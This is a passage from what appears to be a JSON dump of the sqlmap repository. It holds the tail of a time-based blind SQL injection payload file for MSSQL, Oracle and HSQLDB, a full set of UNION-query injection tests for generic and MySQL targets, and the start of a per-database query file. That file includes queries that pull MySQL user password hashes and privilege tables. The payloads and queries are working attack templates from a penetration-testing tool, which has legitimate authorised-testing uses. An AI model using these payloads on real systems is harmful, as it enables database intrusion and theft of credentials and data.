<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>\n        <request>\n            <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt;= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt;= 1.7.2</dbms_version>\n        </details>\n    </test>    \n    \n    <test>\n        <title>HSQLDB &gt; 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/payloads/union_query.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<root>\n    <!-- UNION query tests -->\n    <test>\n        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>\n        <stype>6</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[CHAR]</char>\n            <columns>[COLSTART]-[COLSTOP]</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>\n        <stype>6</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>NULL</char>\n            <columns>[COLSTART]-[COLSTOP]</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>\n        <stype>6</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[RANDNUM]</char>\n            <columns>[COLSTART]-[COLSTOP]</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>\n        <stype>6</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[CHAR]</char>\n            <columns>1-10</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query (NULL) - 1 to 10 columns</title>\n        <stype>6</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>NULL</char>\n            <columns>1-10</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>\n        <stype>6</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[RANDNUM]</char>\n            <columns>1-10</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>\n        <stype>6</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[CHAR]</char>\n            <columns>11-20</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query (NULL) - 11 to 20 columns</title>\n        <stype>6</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>NULL</char>\n            <columns>11-20</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>\n        <stype>6</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[RANDNUM]</char>\n            <columns>11-20</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>\n        <stype>6</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[CHAR]</char>\n            <columns>21-30</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query (NULL) - 21 to 30 columns</title>\n        <stype>6</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>NULL</char>\n            <columns>21-30</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>\n        <stype>6</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[RANDNUM]</char>\n            <columns>21-30</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>\n        <stype>6</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[CHAR]</char>\n            <columns>31-40</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query (NULL) - 31 to 40 columns</title>\n        <stype>6</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>NULL</char>\n            <columns>31-40</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>\n        <stype>6</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[RANDNUM]</char>\n            <columns>31-40</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>\n        <stype>6</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[CHAR]</char>\n            <columns>41-50</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n    <test>\n        <title>Generic UNION query (NULL) - 41 to 50 columns</title>\n        <stype>6</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>NULL</char>\n            <columns>41-50</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>\n        <stype>6</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n            <char>[RANDNUM]</char>\n            <columns>41-50</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>\n        <stype>6</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[CHAR]</char>\n            <columns>[COLSTART]-[COLSTOP]</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>\n        <stype>6</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>NULL</char>\n            <columns>[COLSTART]-[COLSTOP]</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>\n        <stype>6</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[RANDNUM]</char>\n            <columns>[COLSTART]-[COLSTOP]</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>\n        <stype>6</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[CHAR]</char>\n            <columns>1-10</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>\n        <stype>6</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>NULL</char>\n            <columns>1-10</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>\n        <stype>6</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[RANDNUM]</char>\n            <columns>1-10</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>\n        <stype>6</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[CHAR]</char>\n            <columns>11-20</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query (NULL) - 11 to 20 columns</title>\n        <stype>6</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>NULL</char>\n            <columns>11-20</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>\n        <stype>6</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[RANDNUM]</char>\n            <columns>11-20</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>\n        <stype>6</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[CHAR]</char>\n            <columns>21-30</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query (NULL) - 21 to 30 columns</title>\n        <stype>6</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>NULL</char>\n            <columns>21-30</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>\n        <stype>6</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[RANDNUM]</char>\n            <columns>21-30</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>\n        <stype>6</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[CHAR]</char>\n            <columns>31-40</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query (NULL) - 31 to 40 columns</title>\n        <stype>6</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>NULL</char>\n            <columns>31-40</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>\n        <stype>6</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[RANDNUM]</char>\n            <columns>31-40</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>\n        <stype>6</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[CHAR]</char>\n            <columns>41-50</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query (NULL) - 41 to 50 columns</title>\n        <stype>6</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>NULL</char>\n            <columns>41-50</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>\n        <stype>6</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>[UNION]</vector>\n        <request>\n            <payload/>\n            <comment>#</comment>\n            <char>[RANDNUM]</char>\n            <columns>41-50</columns>\n        </request>\n        <response>\n            <union/>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n    <!-- End of UNION query tests -->\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/queries.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<root>\n    <dbms value=\"MySQL\">\n        <!-- http://dba.fyicenter.com/faq/mysql/Difference-between-CHAR-and-NCHAR.html -->\n        <cast query=\"CAST(%s AS NCHAR)\"/>\n        <length query=\"CHAR_LENGTH(%s)\"/>\n        <isnull query=\"IFNULL(%s,' ')\"/>\n        <delimiter query=\",\"/>\n        <limit query=\"LIMIT %d,%d\"/>\n        <limitregexp query=\"\\s+LIMIT\\s+([\\d]+)\\s*\\,\\s*([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" LIMIT \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"-- -\" query2=\"/*\" query3=\"#\"/>\n        <substring query=\"MID((%s),%d,%d)\"/>\n        <concatenate query=\"CONCAT(%s,%s)\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)\"/>\n        <hex query=\"HEX(%s)\"/>\n        <inference query=\"ORD(MID((%s),%d,1))>%d\"/>\n        <banner query=\"VERSION()\"/>\n        <current_user query=\"CURRENT_USER()\"/>\n        <current_db query=\"DATABASE()\"/>\n        <hostname query=\"@@HOSTNAME\"/>\n        <table_comment query=\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'\"/>\n        <column_comment query=\"SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'\"/>\n        <is_dba query=\"(SELECT super_priv FROM mysql.user WHERE user='%s' LIMIT 0,1)='Y'\"/>\n        <check_udf query=\"(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0,1)='%s'\"/>\n        <users>\n            <inband query=\"SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES\" query2=\"SELECT user FROM mysql.user\" query3=\"SELECT username FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS\"/>\n            <blind query=\"SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1\" query2=\"SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1\" query3=\"SELECT DISTINCT(username) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS LIMIT %d,1\" count=\"SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES\" count2=\"SELECT COUNT(DISTINCT(user)) FROM mysql.user\" count3=\"SELECT COUNT(DISTINCT(username)) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS\"/>\n        </users>\n        <!-- https://github.com/dev-sec/mysql-baseline/issues/35 -->\n        <!-- https://stackoverflow.com/a/31122246 -->\n        <passwords>\n            <inband query=\"SELECT user,authentication_string FROM mysql.user\" condition=\"user\"/>\n            <blind query=\"SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1\" count=\"SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'\"/>\n        </passwords>\n        <privileges>\n            <inband query=\"SELECT grantee,privilege_type FROM INFORMATION_SCHEMA.USER_PRIVILEGES\" condition=\"grantee\" query2=\"SELECT user,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user\" condition2=\"user\"/>\n            <blind query=\"SELECT DISTINCT(privilege_type) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s' LIMIT %d,1\" query2=\"SELECT select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d,1\" count=\"SELECT COUNT(DISTINCT(privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s'\" count2=\"SELECT COUNT(*) FROM mysql.user WHERE user='%s'\"/>\n        </privileges>\n        <roles/>\n        <statements>\n            <inband query=\"SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST\" query2=\"SELECT INFO FROM DATA_DICTIONARY.PROCESSLIST\"/>\n            <blind query=\"SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST ORDER BY ID LIMIT %d,1\" query2=\"SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE ID=%d\" query3=\"SELECT ID FROM INFORMATION_SCHEMA.PROCESSLIST LIMIT %d,1\" count=\"SELECT COUNT(DISTINCT(INFO)) FROM INFORMATION_SCHEMA.PROCESSLIST\"/>\n        </statements>\n        <dbs>\n            <inband query=\"SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA\" query2=\"SELECT db FROM mysql.db\"/>\n            <blind query=\"SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1\" query2=\"SELECT DISTINCT(db) FROM mysql.db LIMIT %d,1\" count=\"SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA\" count2=\"SELECT COUNT(DISTINCT(db)) FROM mysql.db\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES\" query2=\"SELECT database_name,table_name FROM mysql.innodb_table_stats\" condition=\"table_schema\" condition2=\"database_name\"/>\n            <blind query=\"SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' LIMIT %d,1\" query2=\"SELECT table_name FROM mysql.innodb_table_stats WHERE database_name='%s' LIMIT %d,1\" count=\"SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\" count2=\"SELECT COUNT(table_name) FROM mysql.innodb_table_stats WHERE database_name='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT column_name,column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n            <blind query=\"SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" query2=\"SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND 